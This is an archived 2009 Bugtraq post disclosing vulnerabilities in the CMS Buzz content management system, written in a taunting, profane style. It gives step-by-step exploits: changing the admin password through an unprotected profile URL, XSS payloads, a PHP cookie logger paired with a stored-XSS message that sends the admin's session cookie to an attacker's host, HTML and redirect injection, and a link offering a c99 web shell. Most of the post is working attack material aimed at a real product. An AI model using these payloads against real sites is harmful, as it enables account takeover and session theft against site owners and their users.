lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 21 Jun 2009 19:02:21 -0000
From: ceza_fuat_kolik@...mail.com
To: bugtraq@...urityfocus.com
Subject: CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

#################################################################################################################
[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities
[+] Discovered By xhaxkerx
[+] Vendor: http://www.c99.mobi
[+] Note : If you are The S3r!0uS  I say To Fuck you Because You are Hacked  Site Of My Best Friends dz-boys.com
[+] Demo:http://demo.cmsbuzz.com/
[+] Greeting : yasin
#################################################################################################################
Remote Changing Password:
+++++++++++++++++++++++++
1) You Must Register In ThE site http://www.victim.com/?action=register
2) Login
3) Go To url:
    http:///www.victim.com/?action=profile&user= [ Name Of user ]
Example
http:///www.victim.com/?action=profile&user=admin
Change admin Password Then go To login http://path/?action=login
Cross Site Scritping
++++++++++++++++++++
http://www.victim.com/?action=search
<script>alert("xss")</script>

#################################################################################################################
[+] CMS Buzz Cookie Grabber Exploit& HTML Injection
[+] Discovered By ThE g0bL!N
[+] Vendor:http://msbuzz.com/
[+] Fuck You The S3r!0uS
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php  - > Put in this File That Code:
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
 
[+]Exploit:
   -------
1) Register in The SIte
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
  The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
1) Register :p
2) Go to send message http://path/?action=compose
3)We Put in
  To:admin name
  Subject: Some Subject
  Message: 1)XSS:PoC :<script>alert("xss")</script>
             ---------
           2)Poc: Iframe :"><iframe src=http://www.google.com/></iframe>
       -------------
     3)PoC : Redirection:">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
     -------------------
     DEMO:http://demo.cmsbuzz.com

# if you need shell http://www.c99.mobi/c99.txt

################################################################################################################

Powered by blists - more mailing lists